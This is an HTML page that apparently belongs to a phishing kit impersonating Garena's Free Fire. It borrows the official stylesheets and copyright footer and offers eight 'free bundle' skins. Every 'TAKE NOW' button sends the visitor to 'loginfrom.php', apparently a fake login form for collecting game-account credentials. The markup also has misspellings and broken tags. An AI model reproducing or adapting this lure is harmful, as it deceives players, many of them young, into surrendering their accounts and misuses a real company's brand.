<!DOCTYPE html>
<html lang="th">

<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
	<title>Free Fire - Garena Gift</title>
    <meta name="title" content="FreeFire">
    <meta name="description" content="FreeFire">
    <meta property="og:title" content="FreeFire">
    <meta property="og:description" content="FreeFire">
	</script>
	<link rel="stylesheet" href="https://ff.garena.com/statics/ff/css/common/reset.css">
	<link rel="stylesheet" href="https://ff.garena.com/statics/ff/css/common.css">  
    <link rel="stylesheet" href="https://ff.garena.com/statics/ff/css/swiper.css">
    <link rel="stylesheet" href="https://ff.garena.com/statics/ff/css/firepass/season02.css">
    <!-- <link href="css/bootstrap.min.css" rel="stylesheet">
    <link href="css/flat-ui.min.css" rel="stylesheet">
    <link href="css/main.css" rel="stylesheet"> -->
    <link href="css/pb.min.css" rel="stylesheet">

    <!--[if lt IE 9]>
      <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
      <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
    <![endif]-->
  </head>
  <body>
    <div id="fb-root"></div>
    <script>(function(d, s, id) {
      var js, fjs = d.getElementsByTagName(s)[0];
      if (d.getElementById(id)) return;
      js = d.createElement(s); js.id = id;
      js.src = "../connect.facebook.net/en_US/sdk.html#xfbml=1&version=v2.3&appId=661774673967000";
      fjs.parentNode.insertBefore(js, fjs);
    }(document, 'script', 'facebook-jssdk'));</script>

    <div class="my-nav">
<span class="active"><a href="choose.html">SELECT BUNDLE</a></span>

</span>
    </div>
<center style="background:url(https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSwmwqJ1qAHC92D3WDpQHKva0SFjbFUT9o-I3ij3cbnG5uonsFp);"><br>
    <div class="container">
      <div class="row">
        <div class="center">
		<center><img src="imgg/logoff.png" width="350px" height="171px" class="gamelogo"></center>
          <h1>
           <font color="white"> CHOOSE ONE OF THE FREE BUNDLE EVENTS </font><br>
            
          </h1>
        </div>

        <div class="clearfix"></div>

                  <div class="col-xs-12 col-sm-6 col-md-3">
            <div class="well">
              <div class="center">
                <img src="freeman/freeman1.png" width="133px" height="171px" alt="" class="img-rounded img-responsive item-bg img-center">
              </div>
              <p class="item">
                <b>BUNDLE CAROLINE</b>
                <br>
                
                <br>
              </p>
              <a href="loginfrom.php" class="btn btn-success btn-embossed btn-block">TAKE NOW</a>
            </div>
          </div>
                  <div class="col-xs-12 col-sm-6 col-md-3">
            <div class="well">
              <div class="center">
                <img src="freeman/freeman2.png" width="144px" height="181px" alt="" class="img-rounded img-responsive item-bg img-center">
              </div>
              <p class="item">
                <b>BUNDLE COMMANDO</b>
                <br>
                
                <br>
              </p>
              <a href="loginfrom.php" class="btn btn-success btn-embossed btn-block">TAKE NOW</a>
            </div>
          </div>
                  <div class="col-xs-12 col-sm-6 col-md-3">
            <div class="well">
              <div class="center">
                <img src="freeman/freeman3.png" width="144px" height="181px" alt="" class="img-rounded img-responsive item-bg img-center">
              </div>
              <p class="item">
                <b>BUNDLE FRONT LINE</b>
                <br>
               
                <br>
              </p>
              <a href="loginfrom.php" class="btn btn-success btn-embossed btn-block">TAKE NOW</a>
            </div>
          </div>
                  <div class="col-xs-12 col-sm-6 col-md-3">
            <div class="well">
              <div class="center">
                <img src="freeman/freeman4.png" width="144px" height="181px" alt="" class="img-rounded img-responsive item-bg img-center">
              </div>
              <p class="item">
                <b>BUNDLE SKULL KING</b>
                <br>
                
                <br>
              </p>
              <a href="loginfrom.php" class="btn btn-success btn-embossed btn-block">TAKE NOW</a>
            </div>
          </div>
                  <div class="col-xs-12 col-sm-6 col-md-3">
            <div class="well">
              <div class="center">
                <img src="freeman/freeman5.png" width="144px" height="181px" alt="" class="img-rounded img-responsive item-bg img-center">
              </div>
              <p class="item">
                <b>BANDLE BAD DOG WARNING</b>
                <br>
                
                <br>
              </p>
              <a href="loginfrom.php" class="btn btn-success btn-embossed btn-block">TAKE NOW</a>
            </div>
          </div>
                  <div class="col-xs-12 col-sm-6 col-md-3">
            <div class="well">
              <div class="center">
                <img src="freeman/freeman6.png" width="144px" height="181px" alt="" class="img-rounded img-responsive item-bg img-center">
              </div>
              <p class="item">
                <b>BUNDLE BLOODY VASE</b>
                <br>
                
                <br>
              </p>
              <a href="loginfrom.php" class="btn btn-success btn-embossed btn-block">TAKE NOW</a>
            </div>
          </div>
                  <div class="col-xs-12 col-sm-6 col-md-3">
            <div class="well">
              <div class="center">
                <img src="freeman/freeman7.png" width="144px" height="181px" alt="" class="img-rounded img-responsive item-bg img-center">
              </div>
              <p class="item">
                <b>BUNDLE RAVER </b>
                <br>
               
                <br>
              </p>
              <a href="loginfrom.php" class="btn btn-success btn-embossed btn-block">TAKE NOW</a>
            </div>
          </div>
                  <div class="col-xs-12 col-sm-6 col-md-3">
            <div class="well">
              <div class="center">
                <img src="freeman/freeman8.png" width="144px" height="181px" alt="" class="img-rounded img-responsive item-bg img-center">
              </div>
              <p class="item">
                <b>BANDLE BLUE TIGHT</b>
                <br>
                
                <br>
              </p>
              <a href="loginfrom.php" class="btn btn-success btn-embossed btn-block">TAKE NOW</a>
            </div>
          </div>
            </div>
          </div>
            </div>
          </div>
            </div>
          </div>
                 
              </div>
            </div>
          </div>
        
        <div class="clearfix"></div>

        <div class="center">
   
        </div>
      </div>
    </div>
<div class="g-footer clearFix">
    <div class="m-foot-wrap">
 <div class="m-foot-copyright">
            <div class="m-foot-logo"><img src="http://freefiremobile-a.akamaihd.net/ffwebsite/images/logo_small_foot.png"></div>
            <div class="txt">Copyright © Garena International.<br>Trademarks belong to their respective owners. All rights Reserved.</div>
    </footer>

</html>